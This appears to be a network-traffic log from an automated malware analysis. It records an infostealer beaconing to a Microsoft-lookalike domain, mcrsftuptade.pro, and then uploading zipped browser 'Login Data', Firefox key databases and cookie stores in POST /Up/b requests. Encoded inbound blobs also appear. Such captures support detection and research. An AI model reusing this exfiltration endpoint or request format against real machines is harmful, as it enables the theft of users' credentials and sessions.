May 10, 2025 08:05:35.760236025 CEST	1358	IN	Data Raw: 43 53 4a 62 58 55 42 65 57 56 77 5a 56 30 74 6c 47 6b 67 65 53 68 5a 58 46 51 67 52 59 6d 52 70 55 51 6b 57 46 52 56 43 45 54 6f 61 61 57 35 39 57 31 70 57 58 6d 39 63 66 31 70 64 56 6c 68 63 61 32 35 77 61 45 70 61 58 31 51 55 65 6c 5a 63 55 6e Data Ascii: CSJbXUBeWVwZV0tlGkgeShZXFQgRYmRpUQkWFRVCEToaaW59W1pWXm9cf1pdVlhca25waEpaX1QUelZcUnJBaW5kR1xFEndhTFQQHRZNFQgCLBpFXBMOG1RaQW9VUBxUTFwVTx97GlsQCxZba25QMggXHhNEGw0Qb1x0WlFQWGVrd0NpWxViQ11PVlFKIHpHXUZHXEVub1VLUEARcFhDUxEsGkEQCwUVFUJdIgIXV0FdWhlXS2U
May 10, 2025 08:05:35.760301113 CEST	1358	IN	Data Raw: 6b 51 43 53 4a 61 61 57 35 53 42 77 34 56 48 68 46 77 47 67 38 51 62 57 68 31 57 46 46 53 62 47 52 70 58 6c 68 52 57 31 5a 64 62 31 78 74 52 6c 64 44 46 48 31 57 52 6c 49 69 46 42 64 47 45 77 34 49 47 78 42 44 62 68 6f 50 45 46 31 64 58 46 56 54 Data Ascii: kQCSJaaW5SBw4VHhFwGg8QbWh1WFFSbGRpXlhRW1Zdb1xtRldDFH1WRlIiFBdGEw4IGxBDbhoPEF1dXFVTXC5dTVcTSRVMEF0iAhdQbWhaBAoRLBpFEAsWZWt+XGNZWW5tZXBnEmB1SlNubWFKUkATRFlBUxMYG0MQCTEUF0JfFgMVQ1pwFlBKVBZEG0kRbhoPEFNoZVQBCiIUF0ITDhtrbn9vW1RebWh3XlFbcldYV21obERXQ
May 10, 2025 08:05:35.760338068 CEST	1358	IN	Data Raw: 57 42 55 65 45 58 51 61 44 77 4d 64 46 6b 6c 5a 45 41 6b 69 56 55 5a 58 56 56 4e 63 47 56 64 4c 5a 52 70 49 48 6b 6f 57 56 78 55 49 45 57 4a 6b 61 56 45 41 42 78 73 62 45 45 4d 69 41 68 64 75 62 57 5a 57 56 6c 39 61 62 6c 39 70 62 6e 35 45 58 45 Data Ascii: WBUeEXQaDwMdFklZEAkiVUZXVVNcGVdLZRpIHkoWVxUIEWJkaVEABxsbEEMiAhdubWZWVl9abl9pbn5EXEVTE1NXU0ZGVUtSbm9PSFBAUBRqQ1NRbF0XHhNAGw0DHyJIWxALFlZHV0FhFlBKVBZEG0kRbhoPEFNoZVQDACIUF0ITDhtrbmFvWVhbX1Nla31DZUpUEmJbX0NFUnJdaW5+RFxFUxNHYBVhRVVbW1cRLBpBEAsFFRV
May 10, 2025 08:05:35.760371923 CEST	1358	IN	Data Raw: 68 66 58 56 52 64 56 47 39 65 52 56 70 59 57 56 64 63 58 46 77 69 46 42 64 63 45 77 34 62 51 41 4d 52 66 52 52 4f 45 46 68 51 47 77 30 51 57 48 42 65 57 6b 4a 61 55 56 56 61 55 30 4e 6a 56 31 78 43 56 46 6c 66 55 6c 78 58 62 56 78 57 56 56 6c 61 Data Ascii: hfXVRdVG9eRVpYWVdcXFwiFBdcEw4bQAMRfRROEFhQGw0QWHBeWkJaUVVaU0NjV1xCVFlfUlxXbVxWVVlaXFBbXm4aGRBfFgMVRQEiRRlJE11dFQgRZlBXXVldVFZXX2JXXUJbVltbVlBuX1ZcUERXU11XakgXHhNaGw0QRDMaSB5KFlBTEAkiW1tfUFlYVlFbcEhbWVtTV15eV3BcWFlQVVJSWF1oWVAQHRZXFQgRdwAXTx1PG
May 10, 2025 08:05:35.760406017 CEST	1358	IN	Data Raw: 56 6c 78 66 57 46 70 52 57 47 35 58 55 6c 6c 57 56 31 31 52 57 6c 74 69 58 46 46 52 56 6c 78 59 56 46 70 59 5a 56 4a 51 55 30 45 57 46 52 56 63 45 54 6f 61 51 67 41 4a 46 6b 51 62 53 52 46 70 58 42 63 49 45 31 35 58 57 6c 42 63 59 6c 4a 59 57 6c Data Ascii: VlxfWFpRWG5XUllWV11RWltiXFFRVlxYVFpYZVJQU0EWFRVcEToaQgAJFkQbSRFpXBcIE15XWlBcYlJYWl1aXlhXVWFRWlhXWFNUWVpsUF1eWVdTFR4RbhoPEEYGABVPH3saXFYTDhtcXl1hXV9YVlZQVV9bbF1FWl9cSVpTXGZXXVVaRF5cVhEsGlsQCxZOBQIRfRROEFhQGw0QWmJWUFhVUlNaX1hwW1teQVFbXF5eblNaV15
May 10, 2025 08:05:35.760438919 CEST	1358	IN	Data Raw: 78 61 45 42 30 57 56 78 55 49 45 58 63 4d 41 42 42 4d 47 45 49 56 57 31 63 69 41 68 64 61 58 31 46 66 55 46 70 65 61 6c 39 58 58 30 46 66 55 31 31 55 57 32 56 65 57 31 64 66 55 6c 64 53 57 46 64 71 56 6c 42 64 56 68 59 56 46 56 77 52 4f 68 70 43 Data Ascii: xaEB0WVxUIEXcMABBMGEIVW1ciAhdaX1FfUFpeal9XX0FfU11UW2VeW1dfUldSWFdqVlBdVhYVFVwROhpCBgcWRBtJEWlcFwgTUklUU15pXV9VV1lUX1xbYltUVFxaXFFQWmpaWVtfUl8VHhFuGg8QRgAOFU8fexpcVhMOG1JVV2RcX1BbWFpdUVhpXV9QU1VXUl1Ra0hSXFxEUllCESwaWxALFk4DChF9FE4QWFAbDRBdaVBZV
May 10, 2025 08:05:35.760473013 CEST	1358	IN	Data Raw: 5a 6c 64 58 57 56 78 66 55 31 68 59 51 32 4e 51 52 56 52 57 56 31 52 66 56 46 6c 75 56 56 74 55 51 56 30 62 47 78 42 64 49 67 49 58 52 51 41 45 43 68 56 50 48 33 73 61 58 46 59 54 44 68 74 63 57 55 4e 73 56 46 35 64 56 56 35 63 57 31 31 61 5a 46 Data Ascii: ZldXWVxfU1hYQ2NQRVRWV1RfVFluVVtUQV0bGxBdIgIXRQAEChVPH3saXFYTDhtcWUNsVF5dVV5cW11aZFFQV1VbU1hVUmNeXUJQXVFYWhEsGlsQCxZOBgIHIkUZSRNdXRUIEW5ZW1hcUFJZWlhpVlxUX19eU1FUZ1tTXFlQWFZfXm1SFx4TWhsNEEQxCAAQTBhCFVtXIgIXXFpQXVBcUGRSUlhXV11TU15mX1ZfV1pVX1FQblF
May 10, 2025 08:05:35.760509014 CEST	1358	IN	Data Raw: 42 61 61 31 74 52 56 56 6c 64 58 56 68 54 56 32 51 61 47 52 42 66 46 67 4d 56 52 51 49 79 43 68 64 50 48 55 38 62 58 6c 59 52 4f 68 70 63 58 46 64 52 57 31 68 54 57 57 64 65 58 56 56 54 58 6b 6c 64 55 46 5a 77 53 46 64 5a 56 6c 70 59 56 56 52 58 Data Ascii: Baa1tRVVldXVhTV2QaGRBfFgMVRQIyChdPHU8bXlYROhpcXFdRW1hTWWdeXVVTXkldUFZwSFdZVlpYVVRXa1xUVBMYG1kQCSJPBAACFkQbSRFpXBcIE0RJVVtRZVRFUVtZUVVWWmhZXlRdX11UXVBjWlJQWkRWFR4RbhoPEEYFCwMQTixDF1tVFgMVWV9nUF1cWlFcVl5Qb1BfWFBaU11WUmVdUlVcUlRbQl8iFBdcEw4bQAMBN
May 10, 2025 08:05:35.760549068 CEST	1358	IN	Data Raw: 55 78 41 66 49 6c 59 58 43 42 4e 44 43 41 4d 44 45 58 30 55 54 68 42 59 55 42 73 4e 45 46 4a 6d 56 46 35 66 56 31 78 63 56 56 64 58 59 6c 4a 63 58 56 68 45 58 6c 74 56 55 47 4a 62 57 46 78 54 52 46 35 62 57 31 78 6d 47 68 6b 51 58 78 59 44 46 55 Data Ascii: UxAfIlYXCBNDCAMDEX0UThBYUBsNEFJmVF5fV1xcVVdXYlJcXVhEXltVUGJbWFxTRF5bW1xmGhkQXxYDFUUCNAoXTx1PG15WEToaUV9bWVVbUF9wW1dfX11WXFFQZFdUW1BcWlNTWWRSWlQTGBtZEAkiTwQGAhZEG0kRaVwXCBNYV1lcXmZbRVBaVV9UQlRkUVlRWlxUX1BYa1pFWVxdXRUeEW4aDxBGBQ0DEE4sQxdbVRYDFV1
May 10, 2025 08:05:35.760586977 CEST	1358	IN	Data Raw: 51 62 53 68 35 49 49 6c 46 52 45 41 73 57 57 6c 42 58 56 6d 39 63 52 56 52 51 55 31 4e 55 56 31 5a 6d 55 56 42 55 58 56 6c 64 55 55 4a 62 63 46 52 65 56 31 39 59 58 31 77 51 48 79 4a 57 46 77 67 54 51 77 67 42 41 78 46 39 46 45 34 51 57 46 41 62 Data Ascii: QbSh5IIlFREAsWWlBXVm9cRVRQU1NUV1ZmUVBUXVldUUJbcFReV19YX1wQHyJWFwgTQwgBAxF9FE4QWFAbDRBDZFlRWFpSUlBRUmZfV1FUXVRUQlFrWVlcV1pcR1BdaxoZEF8WAxVFAjYKF08dTxteVhE6GlpWU1JJUldaaFxeUFhcVFhCWGJSWF1eWl9WXF9iXlZeExgbWRAJIk8EBAIWRBtJEWlcFwgTUlFeXlJoXVxfVlhQU

Timestamp	Bytes transferred	Direction	Data
May 10, 2025 08:05:36.043103933 CEST	414	OUT	POST /Up HTTP/1.1 Host: mcrsftuptade.pro Connection: close Content-Length: 289 Content-Type: application/octet-stream Data Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 4e 27 f4 29 6f 00 00 00 6f 00 00 00 28 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 7b 22 6c 22 3a 22 31 37 34 36 38 35 37 31 33 32 39 32 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 62 74 22 3a 22 47 41 53 22 2c 22 68 69 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 7d 50 4b 01 02 14 00 14 00 00 00 00 00 5c 64 21 52 4e 27 f4 29 6f 00 00 00 6f 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 50 4b 05 06 00 00 00 00 01 00 01 00 56 00 00 00 b5 00 00 00 00 00 Data Ascii: PK\d!RN')oo(f1575b64-8492-4e8b-b102-4d26e8c70371.txt{"l":"1746857132929e146be9-c76a-4720-bcdb-53011b87bd06","bt":"GAS","hi":"9e146be9-c76a-4720-bcdb-53011b87bd06"}PK\d!RN')oo(f1575b64-8492-4e8b-b102-4d26e8c70371.txtPKV
May 10, 2025 08:05:36.343833923 CEST	705	IN	HTTP/1.1 200 OK Date: Sat, 10 May 2025 06:05:36 GMT Content-Length: 0 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yAzCy2OrhufV1P%2FFqc6d%2Bh7FmKo3Hzfx0RYcmFH8mOnDw684ng%2FOV4qXaTiEkOt3Qs0UxmTp9qHOiy%2Bl78vN7k8bCkS6lQ7M%2BXh6lwinohHpvYjYsx182F1HQLXlEni4kLn7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 93d73eecbfeab829-PHX server-timing: cfL4;desc="?proto=TCP&rtt=140960&min_rtt=140960&rtt_var=70480&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=414&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Timestamp	Bytes transferred	Direction	Data
May 10, 2025 08:05:38.882163048 CEST	13580	OUT	POST /Up/b HTTP/1.1 Host: mcrsftuptade.pro Connection: close Content-Length: 41649 Content-Type: application/octet-stream Data Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 c3 94 76 3c 00 a0 00 00 00 a0 00 00 11 00 00 00 62 2f 63 38 2f 30 2f 4c 6f 67 69 6e 20 44 61 74 61 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 02 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 0c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 2e 7a 70 05 00 00 00 01 07 fb 00 00 00 00 0d 07 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: PK\d!Rv<b/c8/0/Login DataSQLite format 3@ .zp [TRUNCATED]
May 10, 2025 08:05:39.023633957 CEST	13580	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:39.023741961 CEST	8148	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:39.023787022 CEST	2716	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:39.023813009 CEST	2716	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:39.165534019 CEST	1038	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:39.499228001 CEST	709	IN	HTTP/1.1 200 OK Date: Sat, 10 May 2025 06:05:39 GMT Content-Length: 0 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oGji7rqV78MEhY87HjNt6s2gE%2FQ0cWYTbnXfH3xhN99ySaW8RWH0vuaHGAa6DcouU%2BLE6yt%2FXlnAzvTlBljRWvFD%2FNlHRfIyGji2ODm2ruFBF5eExvlzXezDhOq6H%2FM2EYqL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 93d73efe79c1f00f-PHX server-timing: cfL4;desc="?proto=TCP&rtt=141374&min_rtt=141374&rtt_var=70687&sent=25&recv=33&lost=0&retrans=0&sent_bytes=0&recv_bytes=41778&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Timestamp	Bytes transferred	Direction	Data
May 10, 2025 08:05:39.740187883 CEST	13580	OUT	POST /Up/b HTTP/1.1 Host: mcrsftuptade.pro Connection: close Content-Length: 524940 Content-Type: application/octet-stream Data Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 33 2e 64 62 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 f5 ac e0 c4 00 80 04 00 00 80 04 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 34 2e 64 62 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 80 00 01 01 00 40 20 20 00 00 00 02 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 2e 6a d0 0d 7f f8 00 08 7a 3c 00 7b ee 7f c3 7b a9 7b 61 7b 1f 7a db 7a 3c 7a aa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: PK\d!Rb/g1/0/key3.dbPK\d!Rb/g1/0/key4.dbSQLite format 3@ .jz<{{{a{zz<z [TRUNCATED]
May 10, 2025 08:05:39.881551981 CEST	2716	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:39.881614923 CEST	5432	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:39.881697893 CEST	2716	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:39.881748915 CEST	2716	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:39.881831884 CEST	8148	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:39.881865025 CEST	2716	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:39.881963968 CEST	2716	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:40.023583889 CEST	2716	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:40.023638964 CEST	5432	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:40.023669958 CEST	2716	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:41.758254051 CEST	716	IN	HTTP/1.1 200 OK Date: Sat, 10 May 2025 06:05:41 GMT Content-Length: 0 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5nMZhLJcJLkWc8Kew7g0szsw2tpgjlqj%2BMn3p9%2FFfIgvLW8%2BLHprNc7fJXlw0m7wf%2FqZ6TryW1m%2F6PGQInLJyK73aTt0JrzNdKIQo7ClHU2PAGmVWwXdHxFU%2B%2FSqWpqVSozG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 93d73f03dcbf0111-PHX server-timing: cfL4;desc="?proto=TCP&rtt=142109&min_rtt=142109&rtt_var=71054&sent=275&recv=389&lost=0&retrans=0&sent_bytes=0&recv_bytes=525070&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Timestamp	Bytes transferred	Direction	Data
May 10, 2025 08:05:43.706265926 CEST	13580	OUT	POST /Up/b HTTP/1.1 Host: mcrsftuptade.pro Connection: close Content-Length: 41643 Content-Type: application/octet-stream Data Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 af 7d e8 83 00 a0 00 00 00 a0 00 00 0e 00 00 00 62 2f 63 38 2f 30 2f 43 6f 6f 6b 69 65 73 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 10 00 01 01 00 40 20 20 00 00 00 13 00 00 00 0a 00 00 00 0a 00 00 00 03 00 00 00 17 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 00 2e 7a 70 0d 0d 18 00 04 09 f1 00 0f 67 0f cf 0a ae 09 f1 09 f1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: PK\d!R}b/c8/0/CookiesSQLite format 3@ .zpg [TRUNCATED]
May 10, 2025 08:05:43.847440004 CEST	2716	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:43.847476006 CEST	2716	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:43.847537994 CEST	2716	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:43.847573042 CEST	2716	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:43.847614050 CEST	2716	OUT	Data Raw: 53 4d 4f 66 6d 2d 4c 30 52 6e 53 38 2f 73 69 67 6e 69 6e 2d 6f 69 64 63 02 01 bb 07 3b 09 37 0d 09 3d 0f 01 02 01 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2e 41 73 70 4e 65 74 43 6f 72 65 2e 41 75 74 68 50 72 6f 76 69 64 65 Data Ascii: SMOfm-L0RnS8/signin-oidc;7=support.microsoft.com.AspNetCore.AuthProvider/I7Ysupport.microsoft.comMicrosoftApplicationsTelemetryDeviceId/#).microsoft.comak_bmsc/(7support.microsoft.comEXPID/%1
May 10, 2025 08:05:43.847637892 CEST	2716	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 10, 2025 08:05:43.847671032 CEST	2716	OUT	Data Raw: 47 99 4b 3a 24 11 92 69 64 8a e7 32 cc 2b 1d 2e 60 32 91 7c 92 1a bc 58 4c 53 9d 64 68 58 f9 c0 74 43 23 d8 13 68 9a f8 e3 f6 1a 9a b8 cd 70 7e 1a 5c 4b d8 a9 16 c5 94 51 b5 83 e5 29 7c c0 1d 56 fe 9d c9 4b 77 a1 81 24 2b 94 c4 1b 03 da c4 21 ee Data Ascii: GK:$id2+.`2\|XLSdhXtC#hp~\KQ)\|VKw$+!{s)T52$EJ^a[P@4 N}TFn_8///Tm/Tm)#K/ewGj.c.bing.co
May 10, 2025 08:05:43.847697973 CEST	2716	OUT	Data Raw: 2f 16 16 06 2f 0d 17 0d 81 4b 0f 06 09 08 06 09 09 09 08 01 02 06 08 09 00 2f 65 77 47 97 5c 6b 2e 63 31 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 53 52 4d 5f 49 76 32 30 ca 6b c1 b0 08 30 b6 c5 26 b9 03 d2 01 3a c5 b6 fd 2f 34 62 79 f2 37 f8 1d Data Ascii: //K/ewG\k.c1.microsoft.comSRM_Iv20k0&:/4by7*RUC>Rv%8Sj9#)4YLs(P`(//k/ewG\k/ewG\o)#K/ewGs.c.bing.comSRM_Iv20h)Dh_g
May 10, 2025 08:05:43.847738981 CEST	2716	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
